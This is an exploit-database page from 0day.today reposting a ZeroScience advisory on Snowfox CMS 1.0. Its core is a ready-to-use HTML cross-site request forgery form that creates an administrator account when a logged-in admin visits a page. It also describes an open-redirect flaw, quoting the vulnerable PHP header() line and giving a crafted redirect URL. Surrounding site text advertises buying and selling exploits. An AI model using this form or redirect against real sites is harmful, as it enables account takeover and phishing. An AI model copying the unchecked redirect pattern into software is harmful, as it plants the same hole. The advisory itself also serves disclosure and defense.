0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Snowfox CMS 1.0 Cross Site Request Forgery / Open Redirect Vulnerabilities
<!-- Snowfox CMS v1.0 CSRF Add Admin Exploit Vendor: Globiz Solutions Product web page: http://www.snowfoxcms.org Affected version: 1.0 Summary: Snowfox is an open source Content Management System (CMS) that allows your website users to create and share content based on permission configurations. Desc: Snowfox CMS suffers from a cross-site request forgery vulnerabilities. The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: Apache/2.4.7 (Win32) PHP/5.5.6 MySQL 5.6.14 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2014-5205 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5205.php 12.11.2014 --> <html> <body> <form action="http://10.0.18.3/snowfox/?uri=admin/accounts/create" method="POST"> <input type="hidden" name="emailAddress" value="lab@zeroscience.mk" /> <input type="hidden" name="verifiedEmail" value="verified" /> <input type="hidden" name="username" value="USERNAME" /> <input type="hidden" name="newPassword" value="PASSWORD" /> <input type="hidden" name="confirmPassword" value="PASSWORD" /> <input type="hidden" name="userGroups[]" value="34" /> <input type="hidden" name="userGroups[]" value="33" /> <input type="hidden" name="memo" value="CSRFmemo" /> <input type="hidden" name="status" value="1" /> <input type="hidden" name="formAction" value="submit" /> <input type="submit" value="Submit form" /> </form> </body> </html> Desc: Input passed via the 'rd' GET parameter in 'selectlanguage.class.php' script is not properly verified before being used to redirect users. This can be exploited to redirect a user to an arbitrary website e.g. when a user clicks a specially crafted link to the affected script hosted on a trusted domain. =========================================================================== \modules\system\controller\selectlanguage.class.php: ---------------------------------------------------- 28: if ($results && isset($inputs['rd'])){ 29: header("location: ".$inputs['rd']); 30: } 31: return $results; =========================================================================== Tested on: Apache/2.4.7 (Win32) PHP/5.5.6 MySQL 5.6.14 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2014-5206 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5206.php 12.11.2014 -- http://10.0.18.3/snowfox/?uri=user/select-language&formAction=submit&rd=http://www.zeroscience.mk&languageId=us-en # 0day.today [2024-11-16] #